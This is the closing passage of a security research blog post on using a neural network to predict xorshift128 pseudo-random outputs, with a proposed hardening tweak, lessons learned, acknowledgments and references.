Using this simple update will add small complexity to PRNG algorithm implementation. It will still make the ML model learn only one possible sequence of about 16M different sequences generated with the same algorithm with different seeds. As if the ML would have only learned the seed of the algorithm, not the algorithm itself. Please note that the purpose of this update is to make the algorithm more resilient to ML attacks, but the other properties of the outcome PRNG, such as periodicity, are yet to be studied.

6. Conclusion

This post discussed how the xorshift128 PRNG works and how to build a machine learning model that can learn from the PRNG’s “randomly” generated numbers to predict them with 100% accuracy. This means that if the ML model gets access to any four consequent numbers generated from this PRNG, it can generate the exact sequence without getting access to the seed. We also studied how we can design an NN model that would represent this PRNG the best. Here are some of the lessons learned from this article:

  1. Although xorshift128 PRNG may to humans appear to not follow any pattern, machine learning can be used to predict the algorithm’s outputs, as the PRNG still follows a hidden pattern.
  2.  Applying deep learning to predict PRNG output requires understanding of the specific underlying algorithm’s design.
  3. It is not necessarily the case that large and complicated machine learning models would attain higher accuracy that simple ones.
  4. Simple neural network (NN) models can easily learn the XOR function.

The python code for training and testing the model outlined in this post is shared in this repo in a form of a Jupyter notebook. Please note that this code is based on top of an old version of the code shared in the post in [1] with the changes explained in this post. This was intentionally done to keep the same data and other parameters unchanged for a fair comparison.

Acknowledgment

I would like to thank my colleagues in NCC Group for their help and support and for giving valuable feedback the especially in the crypto/cybersecurity parts. Here are a few names that I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Marie-Sarah Lacharite.

References

[1] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It

[2] The repo for code implementation  for [1]

[3] https://blog.abhranil.net/2015/03/03/training-neural-networks-with-genetic-algorithms/

❌